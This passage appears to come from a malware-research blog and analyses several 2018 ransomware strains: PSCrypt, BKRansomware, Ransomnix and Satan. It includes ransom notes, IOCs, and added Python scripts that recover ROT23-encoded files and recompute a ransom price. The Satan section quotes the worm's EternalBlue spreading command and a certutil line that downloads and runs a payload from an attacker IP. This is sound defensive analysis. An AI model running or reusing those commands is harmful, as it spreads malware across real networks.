the request of users, we provide contact with customers who have already used the services of our service.<br />MUST REQUEST BACK TO CONTACTS FOR CONNECTION:<br />systems32x@gmail.com - basic<br />systems32x@yahoo.com - backup<br />Additional contacts:<br />systems32x@tutanota.com - (if the answer did not arrive after 24 hours)<br />help32xme@usa.com - (if the answer did not arrive after 24 hours)<br />Additional.mail@mail.com - (if the answer did not arrive after 24 hours)</i></blockquote>
</div>
<div>
<br /></div>
<div>
The English version is rather short and to the point:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>ALL DATA IS ENCRYPTED!<br />For decoding, write to the addresses:<br />systems32x@gmail.com - Basic<br />systems32x@yahoo.com - backup<br />Additional contacts:<br />systems32x@tutanota.com - (if the answer did not arrive after 24 hours)<br />help32xme@usa.com - (if the answer did not arrive after 24 hours)<br />Additional.mail@mail.com - (if the response did not arrive after 24 hours)</i></blockquote>
</div>
<div>
<br />
The cost for restoring service is, interestingly enough, expressed in US dollars this time ($150), as opposed to Ukrainian currency in a previous iteration.</div>
<div>
<br /></div>
<div>
However, the images which included IBox instructions (as payment method) have been removed, and while IBox is still suggested as a service, there's also a new website introduced to pay via Bitcoin using E-BTC. </div>
<div>
<br /></div>
<div>
E-BTC is a Ukrainian service which is "the most reliable and simple service for buying and selling Bitcoins and also the best partner for entering and withdrawing funds to the WEX stock exchange."</div>
<div>
<br /></div>
<div>
It also promises full anonymity.</div>
<div>
<br /></div>
<div>
Back to the ransomware. Encrypted files will have the <b>.docs</b> extension appended, for example Jellyfish.jpg becomes<b> Jellyfish.jpg.docs</b>.</div>
<div>
<br /></div>
<div>
<b>Ransom note</b>: .docs document.html<br />
<b>BTC Wallet</b>: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9<br />
<b>Emails</b>: systems32x@gmail.com, systems32x@yahoo.com, systems32x@tutanota.com, help32xme@usa.com, Additional.mail@mail.com<br />
<br />
<b>Extension</b>: .docs<br />
<br />
Fortunately, it appears no payments have been made as of yet: <a href="https://blockchain.info/address/1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9" target="_blank">1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9</a><br />
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
The last iteration of PSCrypt was observed in 2017, but it appears it has now returned to try and coerce users and organisations into paying the ransom.<br />
<br />
As usual, follow the prevention tips <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a> to stay safe, but the rules of thumb are, as always:<br />
<br />
<ul>
<li>Do not pay, unless there is imminent danger to life</li>
<li>Create regular backups, and do not forget to test if they work</li>
</ul>
<div>
<br /></div>
<div>
IOCs follow below.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs</b></div>
<br />
<script src="https://otx.alienvault.com/pulse/5af03cc976d51929c9dd1ce2.js"></script>
<br /></div>
</div>
</div>
<b><span style="font-size: large;">Vietnamese ransomware wants you to add credit to a mobile phone</span></b> (Bart, published 2018-05-05, updated 2018-05-06)<br />
In this quick blog post we'll have a look at BKRansomware, a Vietnamese ransomware that wants you to top up its phone.<br />
<br />
<b><span style="color: orange;">Update</span></b>: 2018-05-06, scroll down for the update, added to the conclusion.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<b><span style="font-size: large;"><br /></span></b>
This ransomware is named "<b>BKRansomware</b>" based on the file name and debug path. Properties:<br />
<ul>
<li><b>MD5</b>: 892da86e60236c5aaf26e5025af02513</li>
<li><b>SHA1</b>: 6f36c02161a83a3683921fc73319474157f4fb92</li>
<li><b>SHA256</b>: c23f695a19346bf3a5b21fb5a281771808953930d8dcb0a359f163ba0329305f</li>
<li><b>Compilation timestamp</b>: 2018-05-03 10:04:35
</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/c23f695a19346bf3a5b21fb5a281771808953930d8dcb0a359f163ba0329305f/analysis/" target="_blank">c23f695a19346bf3a5b21fb5a281771808953930d8dcb0a359f163ba0329305f</a></li>
</ul>
<div>
<br /></div>
<div>
BKRansomware runs from the command line and displays the following screen:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xPVw5PzVV_A/Wu3kh0IJMYI/AAAAAAAACDc/yo7vwKDfJ2YQmuFuETf8oc9pfNiox0sgQCLcBGAs/s1600/r2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="342" data-original-width="688" height="198" src="https://1.bp.blogspot.com/-xPVw5PzVV_A/Wu3kh0IJMYI/AAAAAAAACDc/yo7vwKDfJ2YQmuFuETf8oc9pfNiox0sgQCLcBGAs/s400/r2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Ransom message</td></tr>
</tbody></table>
<br />
The ransomware message is very brief, and displays:<br />
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>send 50k viettel to 0963210438 to restore your data</i></blockquote>
<div>
<br /></div>
Viettel is a form of credit for mobile phones, used in Vietnam and neighboring countries. It is part of "Viettel Group" (Tập đoàn Công nghiệp Viễn thông Quân đội in Vietnamese), a mobile network operator in Vietnam. (Wiki <a href="https://en.wikipedia.org/wiki/Viettel" target="_blank">link</a>). </div>
<div>
<br /></div>
<div>
As such, it appears the creators are in desperate need of more credit so they can make calls again :)</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
It only encrypts files with a small number of extensions:</div>
<div>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-SzaOJ7ifsiY/Wu3khyYv58I/AAAAAAAACDg/XvwWqnsfZ_METL-iQS6nuARUahlcoiCBwCLcBGAs/s1600/r.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="496" data-original-width="625" height="316" src="https://2.bp.blogspot.com/-SzaOJ7ifsiY/Wu3khyYv58I/AAAAAAAACDg/XvwWqnsfZ_METL-iQS6nuARUahlcoiCBwCLcBGAs/s400/r.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - extensions to encrypt</td></tr>
</tbody></table>
<br />
The list is as follows:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>.txt, .cpp, .docx, .bmp, .doc, .pdf, .jpg, .pptx, .png, .c, .py, .sql</i></blockquote>
<div>
<br /></div>
Encrypted files will have the <b>.hainhc</b> extension appended. Fun note: files aren't actually encrypted, but <b>encoded </b>with ROT23 (each letter is shifted by 23 positions, i.e. three positions backwards). For example, if you have a text file which says "password", the file's new content will be "mxpptloa" instead.</div>
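<div>
Because ROT23 is a fixed Caesar shift, affected files can be recovered without any key. The following is an added example, written for this post and not code from the original post or from the malware itself; it assumes (this is not stated on the page) that only ASCII letters are shifted and case is preserved, so every other byte is left untouched. The <i>.hainhc</i> extension and the "password" / "mxpptloa" pair come from the post.</div>

```python
"""Recover files "encrypted" by BKRansomware, which only applies ROT23 to letters.

Added example, not the post's or the malware's own code. Assumption: only ASCII
letters are shifted (case preserved); all other bytes pass through unchanged.
"""
import os

# Extension BKRansomware appends to each file it processes (from the post)
ENCODED_EXT = ".hainhc"


def rot(text: str, shift: int) -> str:
    """Caesar-shift ASCII letters by `shift` positions, preserving case."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot23_encode(text: str) -> str:
    """What the malware does: shift letters by 23 ("password" -> "mxpptloa")."""
    return rot(text, 23)


def rot23_decode(text: str) -> str:
    """Inverse of ROT23 is a shift of 3 (23 + 3 = 26)."""
    return rot(text, 3)


def decode_bytes(data: bytes) -> bytes:
    """Decode raw file content. latin-1 maps every byte to one code point, so
    non-ASCII bytes (binary files) survive the round trip unchanged."""
    return rot23_decode(data.decode("latin-1")).encode("latin-1")


def recover_file(path: str) -> str:
    """Write the decoded content next to the .hainhc file, under the original
    name, and return that path. The encoded file is kept as evidence."""
    if not path.endswith(ENCODED_EXT):
        raise ValueError(f"not a BKRansomware artefact: {path}")
    with open(path, "rb") as fh:
        decoded = decode_bytes(fh.read())
    original = path[: -len(ENCODED_EXT)]
    with open(original, "wb") as fh:
        fh.write(decoded)
    return original


def recover_tree(root: str) -> list:
    """Recover every .hainhc file below `root`; returns the recovered paths."""
    recovered = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(ENCODED_EXT):
                recovered.append(recover_file(os.path.join(dirpath, name)))
    return recovered


if __name__ == "__main__":
    # Constructed check using the post's own example
    print(rot23_encode("password"))   # mxpptloa
    print(rot23_decode("mxpptloa"))   # password
```

Run it with `recover_tree(r"C:\path\to\affected\folder")` from a Python shell; since the original is preserved, a wrong guess about binary files costs nothing.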
<div>
<br /></div>
<div>
Noteworthy is the debug path: </div>
<div>
<br /></div>
<blockquote class="tr_bq">
C:\Users\Gaara\Documents\Visual Studio 2013\Projects\<b>BKRansomware-20180503T093651Z-001</b>\BKRansomware\Release\BKRansomware.pdb</blockquote>
<div>
<br /></div>
<div>
The extension mentioned above, "hainhc" <i>may</i> refer to the following handle or persona on Whitehat VN, a Vietnamese Network security community:<br />
<a href="https://whitehat.vn/members/hainhc.59556/" target="_blank">https://whitehat.vn/members/hainhc.59556/</a></div>
<div>
<br />
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><b>Conclusion</b></span></div>
<div>
<span style="font-size: large;"><br /></span></div>
<div>
While BKRansomware is not exactly very sophisticated, it is able to encrypt (or rather encode) files, and is unique in the sense that it asks you to top up a mobile phone.<br />
<br />
<b><span style="color: orange;">Update</span></b>: it appears this is a ransomware supposedly used for <i><b>testing</b> </i>purposes, for both coding and testing VirusTotal detections. However, there seems to be a lot of "testing" going on, including keyloggers. Draw your own conclusions.</div>
<div>
<br /></div>
<div>
Follow the prevention tips <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here </a>to stay safe.<br />
<div>
<br />
<br />
<br />
<b>IOCs</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/5aede8891db77b18cd8f8897.js"></script>
<b><br /></b></div>
</div>
<b><span style="font-size: large;">Ransomnix ransomware variant encrypts websites</span></b> (Bart, published 2018-04-28, updated 2018-04-28)<br />
<br />
Ransomnix is a (supposedly Jigsaw, but not really) ransomware variant that holds websites for ransom, and encrypts any files associated with the website.<br />
<br />
This ransomware was discovered in the second half of 2018, and there's a brief write-up by <a href="https://twitter.com/Amigo_A_" target="_blank">Amigo-A</a> here as well: <a href="https://id-ransomware.blogspot.co.uk/2017/08/ransomnix-ransomware.html" target="_blank">Ransomnix ransomware</a><br />
<br />
In this blog post, we'll discuss a newer variant.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
Several encrypted websites were discovered, which display the following message:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-x6ir-2gcjtM/WuR83NdNCnI/AAAAAAAACCo/4p6v7jIWhGkVL9dGFaUqGawkFaDZogiCwCLcBGAs/s1600/Capture.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="748" data-original-width="1600" height="186" src="https://3.bp.blogspot.com/-x6ir-2gcjtM/WuR83NdNCnI/AAAAAAAACCo/4p6v7jIWhGkVL9dGFaUqGawkFaDZogiCwCLcBGAs/s400/Capture.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Ransom message, part 1</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-O3jjlNCeUVs/WuR9Q5uLWwI/AAAAAAAACCw/cNkDWUNLQ9cGpWjqHY903M70FDyneyunACLcBGAs/s1600/Capture2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="594" data-original-width="1600" height="147" src="https://2.bp.blogspot.com/-O3jjlNCeUVs/WuR9Q5uLWwI/AAAAAAAACCw/cNkDWUNLQ9cGpWjqHY903M70FDyneyunACLcBGAs/s400/Capture2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Ransom message, part 2</td></tr>
</tbody></table>
<br />
The full message is as follows:<br />
<div>
<br /></div>
<div>
<div>
<br /></div>
<blockquote>
<i>JIGSAW RANSOMNIX 2018<br />I WANT TO PLAY A GAME!<br />Now Pay 0.2 BTC<br />OR<br />Payment will increase by<br />0.1<br />BTC each day after<br />00:00:00<br />Your Key Will Be Deleted<br />Your Bill till now 2.4000000000000004 BTC<br />Dear manager, on<br />Fri Apr 06 2018 02:08:34 GMT+0100 (GMT Summer Time)<br />your database server has been locked, your databases files are encrypted<br />and you have unfortunately "lost" all your data, Encryption was produced using<br />unique public key RSA-2048 generated for this server.<br />To decrypt files you need to obtain the private key.<br />All encrypted files ends with .Crypt<br />Your reference number: 4027<br />To obtain the program for this server, which will decrypt all files,<br />you need to pay 0.2 bitcoin on our bitcoin address 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o (today 1 bitcoin was around 15000 $).<br />After payment send us your number on our mail crypter@cyberservices.com and we will send you decryption tool (you need only run it and all files will be decrypted during a few hours depending on your content size).<br />Before payment you can send us one small file (100..500 kilobytes) and we will decrypt it!<br />It's your guarantee that we have decryption tool. (use your reference number as a subject to your message)<br />We don't know who are you, All what we need is some money.<br />Don't panic if we don't answer you during 24 hours. It means that we didn't received your letter and write us again.<br />You can use one of that bitcoin exchangers for transfering bitcoin.<br />https://localbitcoins.com<br />https://www.kraken.com<br />You dont need install bitcoin programs - you need only use one of this exchangers or other exchanger that you can find in www.google.com for your country.<br />Please use english language in your letters. 
If you don't speak english then use https://translate.google.com to translate your letter on english language.<br />You do not have enough time to think each day payment will increase by<br />0.1 BTC and after one week your privite key will be deleted and your files will be locked for ever.<br /><br />People use cryptocurrency for bad choices,<br /> but today you will have to use it to pay for your files!<br /> It's your choice!</i></blockquote>
<div>
<br /></div>
<div>
The following JavaScript is responsible for keeping track of the price, and increasing it:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ZwC6yq7czQU/WuR_k0RBWDI/AAAAAAAACC8/toiVAHRMOxQJARnMylUm4IF_aWEnhMmzwCLcBGAs/s1600/function.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="610" data-original-width="1139" height="213" src="https://3.bp.blogspot.com/-ZwC6yq7czQU/WuR_k0RBWDI/AAAAAAAACC8/toiVAHRMOxQJARnMylUm4IF_aWEnhMmzwCLcBGAs/s400/function.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - JS function</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The starting price is set at 0.2 BTC, but will increase by 0.1 BTC every day thanks to two functions: <i>inprice</i> and <i>startTimer</i>.</div>
<div>
The function for calculating the time and date, <i>startTimer</i>, is a copy/paste from the following StackOverflow answer: <a href="https://stackoverflow.com/a/20618517/7553720" target="_blank">The simplest possible JavaScript countdown timer?</a></div>
<div>
<br /></div>
<div>
Note that the <i>start_date</i> variable, 1522976914000, is the epoch timestamp in milliseconds, which converted is indeed Friday 6 April 2018 01:08:34 (UTC), as mentioned in the ransom note.</div>
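<div>
Two details of the note can be reproduced from these values: the date conversion of <i>start_date</i>, and the odd "2.4000000000000004 BTC" bill, which is simply what binary floating point produces for 0.2 + 22 × 0.1 (22 days after 6 April is 28 April, the date of this post). The following is an added example and not the page's JavaScript from Figure 3; the start timestamp and the pricing rule (0.2 BTC plus 0.1 BTC per elapsed day) come from the post, while the exact expression the original <i>inprice</i> function uses is an assumption.</div>

```python
"""Re-implement the Ransomnix price counter to sanity-check the ransom note.

Added example, not the ransom page's own JavaScript. START_DATE_MS and the
pricing rule come from the post; the exact formula is assumed.
"""
from datetime import datetime, timezone
from decimal import Decimal

START_DATE_MS = 1522976914000            # start_date from the ransom page
BASE_BTC = 0.2                           # initial demand
STEP_BTC = 0.1                           # daily increase
MS_PER_DAY = 24 * 60 * 60 * 1000


def start_datetime_utc() -> datetime:
    """Convert the millisecond epoch value to a UTC datetime."""
    return datetime.fromtimestamp(START_DATE_MS / 1000, tz=timezone.utc)


def days_elapsed(now_ms: int) -> int:
    """Whole days since start_date (never negative)."""
    return max(0, (now_ms - START_DATE_MS) // MS_PER_DAY)


def bill_float(now_ms: int) -> float:
    """The naive computation in IEEE-754 doubles, as JavaScript (and Python)
    do it: this is where 2.4000000000000004 comes from."""
    return BASE_BTC + days_elapsed(now_ms) * STEP_BTC


def bill_exact(now_ms: int) -> Decimal:
    """Same rule in decimal arithmetic; no representation artefact."""
    return Decimal("0.2") + days_elapsed(now_ms) * Decimal("0.1")


if __name__ == "__main__":
    print(start_datetime_utc().isoformat())           # 2018-04-06T01:08:34+00:00
    now = START_DATE_MS + 22 * MS_PER_DAY              # 22 days later: 28 April
    print(repr(bill_float(now)), bill_exact(now))      # 2.4000000000000004 2.4
```

Nothing in the note is "computed" server-side: the whole counter lives in the victim's browser, so the figure it shows is a presentation detail, not evidence that the actors track individual victims.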
<div>
<br /></div>
<div>
Ransomware message details:</div>
<div>
<br /></div>
<div>
<div>
<b>BTC Wallet</b>: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o</div>
<div>
<b>Email</b>: crypter@cyberservices.com </div>
<div>
<b>Extension</b>: .Crypt</div>
</div>
<div>
<br /></div>
<div>
Files will be encrypted, as claimed by the cybercriminals, with RSA-2048.<br />
<br />
Unfortunately, it appears several people have already paid for decryption: <a href="https://blockchain.info/address/1VirusnmipsYSA5jMv8NKstL8FkVjNB9o" target="_blank">1VirusnmipsYSA5jMv8NKstL8FkVjNB9o</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Disinfection</span></b></div>
<div>
<br /></div>
<div>
If possible, restore the website from a backup, and subsequently <b>patch</b> your website. This means: install all relevant security patches for your CMS, and for plugins where applicable.</div>
<div>
<br /></div>
<div>
Then, change all your passwords. Better safe than sorry.</div>
<div>
<br /></div>
<div>
It is currently unknown if decryption is possible. If you have an example of an encrypted file, please do upload it to <a href="https://id-ransomware.malwarehunterteam.com/" target="_blank">ID Ransomware</a> and <a href="https://www.nomoreransom.org/crypto-sheriff.php?lang=en" target="_blank">NoMoreRansom</a>, to see if decryption is possible, or if a decryptor can be developed.</div>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Prevention</span></b></div>
<div>
<br /></div>
<div>
For preventing ransomware that attacks your websites, you can follow my prevention tips <a href="https://bartblaze.blogspot.co.uk/2015/03/c99shell-not-dead.html#prevention" target="_blank">here</a>.</div>
<div>
<br /></div>
<div>
General ransomware prevention tips can be found <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a>.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<br /></div>
<div>
Ransomware can in theory be installed on everything; whether it's your machine, your website, or your IoT device. Follow the prevention tips above to stay safe.</div>
<div>
<br /></div>
<div>
<b>Remember</b>: create backups, regularly, and test them as well.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs</b></div>
<div>
<script src="https://otx.alienvault.com/pulse/5ae48667004c860b480e79c9.js"></script>
</div>
<div>
<br /></div>
<b><span style="font-size: large;">Satan ransomware adds EternalBlue exploit</span></b> (Bart, published 2018-04-22, updated 2018-08-05)<br />
Today, <a href="https://twitter.com/malwrhunterteam" target="_blank">MalwareHunterTeam</a> reached out to me about a possible new variant of Satan ransomware.<br />
<br />
Satan ransomware itself has been around since January 2017 as reported by <a href="https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/" target="_blank">Bleeping Computer</a>.<br />
<br />
In this blog post we'll analyse a new version of the infamous Satan ransomware, which since <b>November 2017</b> has been using the <b>EternalBlue</b> exploit to spread via the network, and consequently encrypt files.<br />
<div>
<br /></div>
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<b><br /></b>
First up is a file inconspicuously named "sts.exe", which may refer to "<b>S</b>a<b>t</b>an <b>s</b>preader".<br />
<br />
<ul>
<li><b>MD5</b>: 12bc52fd9da66db3e63bfb196ceb9be6</li>
<li><b>SHA1</b>: 4508e3442673c149b31e3fffc29cc95f834975bc</li>
<li><b>SHA256</b>: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee</li>
<li><b>Compilation timestamp</b>: 2018-04-14 06:33:08</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee/analysis/" target="_blank">b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee</a></li>
</ul>
<div>
<br /></div>
<div>
The file is packed with PECompact 2, and is therefore only 30KB in filesize. </div>
<div>
<br /></div>
<div>
Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: <a href="https://bartblaze.blogspot.co.uk/2018/04/maktub-ransomware-possibly-rebranded-as.html" target="_blank">Iron ransomware</a>, which may be a spin-off from Satan, has used VMProtect.</div>
<div>
<br /></div>
<div>
"sts.exe" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-I5nru5dPajo/WtvG5AHK9SI/AAAAAAAACBY/4QFJ0Ob8AuE3Yeb-KsVwDewgpPHsNO1FgCLcBGAs/s1600/Extr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="270" data-original-width="673" height="160" src="https://4.bp.blogspot.com/-I5nru5dPajo/WtvG5AHK9SI/AAAAAAAACBY/4QFJ0Ob8AuE3Yeb-KsVwDewgpPHsNO1FgCLcBGAs/s400/Extr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - download and extract two new files</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent "<b>RookIE/1.0</b>", which seems a rather unique User-Agent.</div>
<div>
<ul>
<li>ms.exe has password: <b>iamsatancryptor</b></li>
<li>client.exe has password: <b>abcdefghijklmn</b></li>
</ul>
<div>
It appears the Satan ransomware developers showcase some sense of humor by using the password "iamsatancryptor". </div>
</div>
<div>
<br /></div>
<div>
Once the user has executed "sts.exe", they will get the following UAC prompt, if enabled:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-QTIpi0Ak36s/WtvKckTPPFI/AAAAAAAACBk/cccMQsmUawUH21JIFnTzL1Dl30gDxxctgCLcBGAs/s1600/UAC.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="295" data-original-width="465" height="253" src="https://3.bp.blogspot.com/-QTIpi0Ak36s/WtvKckTPPFI/AAAAAAAACBk/cccMQsmUawUH21JIFnTzL1Dl30gDxxctgCLcBGAs/s400/UAC.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - UAC prompt</td></tr>
</tbody></table>
<br />
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.<br />
<div>
<br /></div>
<div>
Curiously, and thanks to the <b>s2 </b>option, the start dialog will be hidden, but the extraction progress is displayed - this means we <b>need to click through to install the ransomware</b>. Even more curious: the setup is in Chinese.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-8KPzr_fjGGw/WtvLVj4CSSI/AAAAAAAACBs/feGQmfm2qsA0I5aO5xL-WpUsgwvo1KFeACLcBGAs/s1600/Setup.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="380" data-original-width="536" height="282" src="https://3.bp.blogspot.com/-8KPzr_fjGGw/WtvLVj4CSSI/AAAAAAAACBs/feGQmfm2qsA0I5aO5xL-WpUsgwvo1KFeACLcBGAs/s400/Setup.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - End of setup screen</td></tr>
</tbody></table>
<br />
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the <b>EternalBlue</b> exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the <b>C:\ProgramData</b> folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.<br />
<div>
<br /></div>
<div>
The infection of other machines on the network will be achieved with the following command:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp </i></blockquote>
<div>
<br /></div>
<div>
We can then see an attempt to spread the ransomware to other machines on the same network:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-okfkJtKG6FE/WtvOUPjKXhI/AAAAAAAACB4/0npExK5E3voQLaP2MpdZRnhecsObdg2XgCLcBGAs/s1600/smb.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="235" data-original-width="651" height="143" src="https://3.bp.blogspot.com/-okfkJtKG6FE/WtvOUPjKXhI/AAAAAAAACB4/0npExK5E3voQLaP2MpdZRnhecsObdg2XgCLcBGAs/s400/smb.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Spreading attempt over SMB, port 445</td></tr>
</tbody></table>
<br />
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using <b>DoublePulsar</b>, and executes the following command:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe</i></blockquote>
<div>
<br /></div>
<div>
This is used to plant sts.exe on other machines in the network, where it is then executed.</div>
<div>
<br /></div>
<div>
Satan ransomware itself, which is contained in Client.exe, will be dropped to <b>C:\Cryptor.exe</b>.<br />
<br />
This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, so that the ransomware can also encrypt files that would otherwise be locked by those processes.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-wXkLPSZSTfE/WtvSGyBI8xI/AAAAAAAACCE/xK4Y9O6FSQERG0sUx5pU6QY4zWUfyHfggCLcBGAs/s1600/DB.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="392" data-original-width="648" height="241" src="https://3.bp.blogspot.com/-wXkLPSZSTfE/WtvSGyBI8xI/AAAAAAAACCE/xK4Y9O6FSQERG0sUx5pU6QY4zWUfyHfggCLcBGAs/s400/DB.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Database-related processes</td></tr>
</tbody></table>
<br />
What's new in this version of Satan is that the exclusion list has changed slightly: it will not encrypt files with any of the following words in their path:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<i>windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user</i></blockquote>
<div>
<br /></div>
<div>
This exclusion list is reminiscent of <a href="https://bartblaze.blogspot.co.uk/2018/04/maktub-ransomware-possibly-rebranded-as.html" target="_blank">Iron ransomware</a> (or vice versa).</div>
<div>
<br /></div>
<div>
Satan will, after encryption, automatically open the following ransomware note: <b>C:\_How_to_decrypt_files.txt</b>:</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
